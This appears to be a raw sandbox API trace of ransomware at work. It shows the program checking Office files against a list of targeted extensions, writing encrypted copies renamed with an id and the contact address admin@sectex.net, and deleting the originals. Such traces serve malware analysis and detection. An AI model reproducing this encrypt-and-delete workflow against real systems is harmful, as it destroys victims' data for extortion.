	[0145.018] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gantt.vsl")) returned 1
	[0145.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.019] lstrlenW (lpString=".doc") returned 4
	[0145.019] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0145.019] lstrlenW (lpString=".docx") returned 5
	[0145.019] lstrcmpiW (lpString1=".docx", lpString2="T.VSL") returned -1
	[0145.019] lstrlenW (lpString=".pdf") returned 4
	[0145.019] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0145.019] lstrlenW (lpString=".xls") returned 4
	[0145.019] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0145.019] lstrlenW (lpString=".xlsx") returned 5
	[0145.019] lstrcmpiW (lpString1=".xlsx", lpString2="T.VSL") returned -1
	[0145.019] lstrlenW (lpString=".ppt") returned 4
	[0145.019] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0145.019] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.019] lstrlenW (lpString=".zip") returned 4
	[0145.019] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0145.019] lstrlenW (lpString=".rar") returned 4
	[0145.019] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0145.019] lstrlenW (lpString=".bz2") returned 4
	[0145.019] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0145.019] lstrlenW (lpString=".7z") returned 3
	[0145.019] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0145.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.020] lstrlenW (lpString=".dbf") returned 4
	[0145.020] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0145.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.020] lstrlenW (lpString=".1cd") returned 4
	[0145.020] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0145.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.020] lstrlenW (lpString=".jpg") returned 4
	[0145.020] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0145.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.020] lstrlenW (lpString=".doc") returned 4
	[0145.020] lstrcmpiW (lpString1=".doc", lpString2=".VSL") returned -1
	[0145.020] lstrlenW (lpString=".docx") returned 5
	[0145.020] lstrcmpiW (lpString1=".docx", lpString2="T.VSL") returned -1
	[0145.020] lstrlenW (lpString=".pdf") returned 4
	[0145.020] lstrcmpiW (lpString1=".pdf", lpString2=".VSL") returned -1
	[0145.020] lstrlenW (lpString=".xls") returned 4
	[0145.020] lstrcmpiW (lpString1=".xls", lpString2=".VSL") returned 1
	[0145.020] lstrlenW (lpString=".xlsx") returned 5
	[0145.020] lstrcmpiW (lpString1=".xlsx", lpString2="T.VSL") returned -1
	[0145.020] lstrlenW (lpString=".ppt") returned 4
	[0145.020] lstrcmpiW (lpString1=".ppt", lpString2=".VSL") returned -1
	[0145.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.020] lstrlenW (lpString=".zip") returned 4
	[0145.020] lstrcmpiW (lpString1=".zip", lpString2=".VSL") returned 1
	[0145.020] lstrlenW (lpString=".rar") returned 4
	[0145.020] lstrcmpiW (lpString1=".rar", lpString2=".VSL") returned -1
	[0145.020] lstrlenW (lpString=".bz2") returned 4
	[0145.020] lstrcmpiW (lpString1=".bz2", lpString2=".VSL") returned -1
	[0145.020] lstrlenW (lpString=".7z") returned 3
	[0145.020] lstrcmpiW (lpString1=".7z", lpString2="VSL") returned -1
	[0145.020] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.020] lstrlenW (lpString=".dbf") returned 4
	[0145.021] lstrcmpiW (lpString1=".dbf", lpString2=".VSL") returned -1
	[0145.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.021] lstrlenW (lpString=".1cd") returned 4
	[0145.021] lstrcmpiW (lpString1=".1cd", lpString2=".VSL") returned -1
	[0145.021] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GANTT.VSL") returned 57
	[0145.021] lstrlenW (lpString=".jpg") returned 4
	[0145.021] lstrcmpiW (lpString1=".jpg", lpString2=".VSL") returned -1
	[0145.021] lstrcmpiW (lpString1=".GRA", lpString2=".bot") returned 1
	[0145.021] lstrlenW (lpString="GR8GALRY.GRA") returned 12
	[0145.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0145.021] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=186880) returned 1
	[0145.021] CloseHandle (hObject=0x3b0) returned 1
	[0145.021] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra")) returned 0x20
	[0145.022] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3b0
	[0145.022] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.022] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x384
	[0145.022] GetLastError () returned 0x0
	[0145.022] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x2da00, lpOverlapped=0x0) returned 1
	[0145.199] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x2da10, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x2da10, lpOverlapped=0x0) returned 1
	[0145.202] ReadFile (in: hFile=0x3b0, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.202] WriteFile (in: hFile=0x384, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0145.203] SetEndOfFile (hFile=0x384) returned 1
	[0145.620] CloseHandle (hObject=0x384) returned 1
	[0145.659] SetFilePointerEx (in: hFile=0x3b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.659] SetEndOfFile (hFile=0x3b0) returned 1
	[0145.663] CloseHandle (hObject=0x3b0) returned 1
	[0145.663] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.752] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\gr8galry.gra")) returned 1
	[0145.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.777] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.778] lstrlenW (lpString=".doc") returned 4
	[0145.778] lstrcmpiW (lpString1=".doc", lpString2=".GRA") returned -1
	[0145.778] lstrlenW (lpString=".docx") returned 5
	[0145.778] lstrcmpiW (lpString1=".docx", lpString2="Y.GRA") returned -1
	[0145.778] lstrlenW (lpString=".pdf") returned 4
	[0145.778] lstrcmpiW (lpString1=".pdf", lpString2=".GRA") returned 1
	[0145.778] lstrlenW (lpString=".xls") returned 4
	[0145.778] lstrcmpiW (lpString1=".xls", lpString2=".GRA") returned 1
	[0145.778] lstrlenW (lpString=".xlsx") returned 5
	[0145.778] lstrcmpiW (lpString1=".xlsx", lpString2="Y.GRA") returned -1
	[0145.778] lstrlenW (lpString=".ppt") returned 4
	[0145.778] lstrcmpiW (lpString1=".ppt", lpString2=".GRA") returned 1
	[0145.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.778] lstrlenW (lpString=".zip") returned 4
	[0145.778] lstrcmpiW (lpString1=".zip", lpString2=".GRA") returned 1
	[0145.778] lstrlenW (lpString=".rar") returned 4
	[0145.778] lstrcmpiW (lpString1=".rar", lpString2=".GRA") returned 1
	[0145.778] lstrlenW (lpString=".bz2") returned 4
	[0145.778] lstrcmpiW (lpString1=".bz2", lpString2=".GRA") returned -1
	[0145.778] lstrlenW (lpString=".7z") returned 3
	[0145.778] lstrcmpiW (lpString1=".7z", lpString2="GRA") returned -1
	[0145.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.778] lstrlenW (lpString=".dbf") returned 4
	[0145.778] lstrcmpiW (lpString1=".dbf", lpString2=".GRA") returned -1
	[0145.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.778] lstrlenW (lpString=".1cd") returned 4
	[0145.778] lstrcmpiW (lpString1=".1cd", lpString2=".GRA") returned -1
	[0145.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.778] lstrlenW (lpString=".jpg") returned 4
	[0145.778] lstrcmpiW (lpString1=".jpg", lpString2=".GRA") returned 1
	[0145.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.778] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.778] lstrlenW (lpString=".doc") returned 4
	[0145.779] lstrcmpiW (lpString1=".doc", lpString2=".GRA") returned -1
	[0145.779] lstrlenW (lpString=".docx") returned 5
	[0145.779] lstrcmpiW (lpString1=".docx", lpString2="Y.GRA") returned -1
	[0145.779] lstrlenW (lpString=".pdf") returned 4
	[0145.779] lstrcmpiW (lpString1=".pdf", lpString2=".GRA") returned 1
	[0145.779] lstrlenW (lpString=".xls") returned 4
	[0145.779] lstrcmpiW (lpString1=".xls", lpString2=".GRA") returned 1
	[0145.779] lstrlenW (lpString=".xlsx") returned 5
	[0145.779] lstrcmpiW (lpString1=".xlsx", lpString2="Y.GRA") returned -1
	[0145.779] lstrlenW (lpString=".ppt") returned 4
	[0145.779] lstrcmpiW (lpString1=".ppt", lpString2=".GRA") returned 1
	[0145.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.779] lstrlenW (lpString=".zip") returned 4
	[0145.779] lstrcmpiW (lpString1=".zip", lpString2=".GRA") returned 1
	[0145.779] lstrlenW (lpString=".rar") returned 4
	[0145.779] lstrcmpiW (lpString1=".rar", lpString2=".GRA") returned 1
	[0145.779] lstrlenW (lpString=".bz2") returned 4
	[0145.779] lstrcmpiW (lpString1=".bz2", lpString2=".GRA") returned -1
	[0145.779] lstrlenW (lpString=".7z") returned 3
	[0145.779] lstrcmpiW (lpString1=".7z", lpString2="GRA") returned -1
	[0145.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.779] lstrlenW (lpString=".dbf") returned 4
	[0145.779] lstrcmpiW (lpString1=".dbf", lpString2=".GRA") returned -1
	[0145.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.779] lstrlenW (lpString=".1cd") returned 4
	[0145.779] lstrcmpiW (lpString1=".1cd", lpString2=".GRA") returned -1
	[0145.779] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GR8GALRY.GRA") returned 60
	[0145.779] lstrlenW (lpString=".jpg") returned 4
	[0145.779] lstrcmpiW (lpString1=".jpg", lpString2=".GRA") returned 1
	[0145.779] lstrcmpiW (lpString1=".HXC", lpString2=".bot") returned 1
	[0145.780] lstrlenW (lpString="GRAPH_COL.HXC") returned 13
	[0145.780] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0145.852] GetFileSizeEx (in: hFile=0x3ac, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=621) returned 1
	[0145.852] CloseHandle (hObject=0x3ac) returned 1
	[0145.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc")) returned 0x20
	[0145.852] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3ac
	[0145.852] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.852] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.852] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0145.853] GetLastError () returned 0x0
	[0145.853] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x26d, lpOverlapped=0x0) returned 1
	[0145.867] WriteFile (in: hFile=0x3c4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0x270, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0x270, lpOverlapped=0x0) returned 1
	[0145.868] ReadFile (in: hFile=0x3ac, lpBuffer=0xb3a0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xaacfed4, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesRead=0xaacfed4*=0x0, lpOverlapped=0x0) returned 1
	[0145.868] WriteFile (in: hFile=0x3c4, lpBuffer=0xb3a0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0xaacfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb3a0020*, lpNumberOfBytesWritten=0xaacfc9c*=0xee, lpOverlapped=0x0) returned 1
	[0145.868] SetEndOfFile (hFile=0x3c4) returned 1
	[0145.868] CloseHandle (hObject=0x3c4) returned 1
	[0145.869] SetFilePointerEx (in: hFile=0x3ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xaacfec8 | out: lpNewFilePointer=0x0) returned 1
	[0145.869] SetEndOfFile (hFile=0x3ac) returned 1
	[0145.871] CloseHandle (hObject=0x3ac) returned 1
	[0145.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0145.871] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\graph_col.hxc")) returned 1
	[0145.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.873] lstrlenW (lpString=".doc") returned 4
	[0145.873] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0145.873] lstrlenW (lpString=".docx") returned 5
	[0145.873] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0145.873] lstrlenW (lpString=".pdf") returned 4
	[0145.873] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0145.873] lstrlenW (lpString=".xls") returned 4
	[0145.873] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0145.873] lstrlenW (lpString=".xlsx") returned 5
	[0145.873] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0145.873] lstrlenW (lpString=".ppt") returned 4
	[0145.873] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0145.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.873] lstrlenW (lpString=".zip") returned 4
	[0145.873] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0145.873] lstrlenW (lpString=".rar") returned 4
	[0145.873] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0145.873] lstrlenW (lpString=".bz2") returned 4
	[0145.873] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0145.873] lstrlenW (lpString=".7z") returned 3
	[0145.873] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0145.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.873] lstrlenW (lpString=".dbf") returned 4
	[0145.873] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0145.873] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.873] lstrlenW (lpString=".1cd") returned 4
	[0145.873] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0145.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.874] lstrlenW (lpString=".jpg") returned 4
	[0145.874] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0145.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.874] lstrlenW (lpString=".doc") returned 4
	[0145.874] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1
	[0145.874] lstrlenW (lpString=".docx") returned 5
	[0145.874] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1
	[0145.874] lstrlenW (lpString=".pdf") returned 4
	[0145.874] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1
	[0145.874] lstrlenW (lpString=".xls") returned 4
	[0145.874] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1
	[0145.874] lstrlenW (lpString=".xlsx") returned 5
	[0145.874] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1
	[0145.874] lstrlenW (lpString=".ppt") returned 4
	[0145.874] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1
	[0145.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.874] lstrlenW (lpString=".zip") returned 4
	[0145.874] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1
	[0145.874] lstrlenW (lpString=".rar") returned 4
	[0145.874] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1
	[0145.874] lstrlenW (lpString=".bz2") returned 4
	[0145.874] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1
	[0145.874] lstrlenW (lpString=".7z") returned 3
	[0145.874] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1
	[0145.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.874] lstrlenW (lpString=".dbf") returned 4
	[0145.874] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1
	[0145.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.874] lstrlenW (lpString=".1cd") returned 4
	[0145.874] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1
	[0145.874] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRAPH_COL.HXC") returned 61
	[0145.874] lstrlenW (lpString=".jpg") returned 4
	[0145.875] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1
	[0145.875] lstrcmpiW (lpString1=".DLL", lpString2=".bot") returned 1
	[0145.875] lstrlenW (lpString="GRLEX.DLL") returned 9
	[0145.875] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grlex.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3d8
	[0145.895] GetFileSizeEx (in: hFile=0x3d8, lpFileSize=0xaacff1c | out: lpFileSize=0xaacff1c*=12672) returned 1
	[0145.895] CloseHandle (hObject=0x3d8) returned 1
	[0145.895] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grlex.dll")) returned 0x20
	[0145.899] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grlex.dll.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0145.911] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\grlex.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff
	[0145.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.921] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.921] lstrlenW (lpString=".doc") returned 4
	[0145.921] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0145.921] lstrlenW (lpString=".docx") returned 5
	[0145.922] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1
	[0145.922] lstrlenW (lpString=".pdf") returned 4
	[0145.922] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0145.922] lstrlenW (lpString=".xls") returned 4
	[0145.922] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0145.922] lstrlenW (lpString=".xlsx") returned 5
	[0145.922] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1
	[0145.922] lstrlenW (lpString=".ppt") returned 4
	[0145.922] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0145.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.922] lstrlenW (lpString=".zip") returned 4
	[0145.922] lstrcmpiW (lpString1=".zip", lpString2=".DLL") returned 1
	[0145.922] lstrlenW (lpString=".rar") returned 4
	[0145.922] lstrcmpiW (lpString1=".rar", lpString2=".DLL") returned 1
	[0145.922] lstrlenW (lpString=".bz2") returned 4
	[0145.922] lstrcmpiW (lpString1=".bz2", lpString2=".DLL") returned -1
	[0145.922] lstrlenW (lpString=".7z") returned 3
	[0145.922] lstrcmpiW (lpString1=".7z", lpString2="DLL") returned -1
	[0145.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.922] lstrlenW (lpString=".dbf") returned 4
	[0145.922] lstrcmpiW (lpString1=".dbf", lpString2=".DLL") returned -1
	[0145.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.922] lstrlenW (lpString=".1cd") returned 4
	[0145.922] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1
	[0145.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.922] lstrlenW (lpString=".jpg") returned 4
	[0145.922] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1
	[0145.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.922] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.922] lstrlenW (lpString=".doc") returned 4
	[0145.922] lstrcmpiW (lpString1=".doc", lpString2=".DLL") returned 1
	[0145.922] lstrlenW (lpString=".docx") returned 5
	[0145.923] lstrcmpiW (lpString1=".docx", lpString2="X.DLL") returned -1
	[0145.923] lstrlenW (lpString=".pdf") returned 4
	[0145.923] lstrcmpiW (lpString1=".pdf", lpString2=".DLL") returned 1
	[0145.923] lstrlenW (lpString=".xls") returned 4
	[0145.923] lstrcmpiW (lpString1=".xls", lpString2=".DLL") returned 1
	[0145.923] lstrlenW (lpString=".xlsx") returned 5
	[0145.923] lstrcmpiW (lpString1=".xlsx", lpString2="X.DLL") returned -1
	[0145.923] lstrlenW (lpString=".ppt") returned 4
	[0145.923] lstrcmpiW (lpString1=".ppt", lpString2=".DLL") returned 1
	[0145.923] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\GRLEX.DLL") returned 57
	[0145.923] lstrlenW (lpString=".zip") returned 4
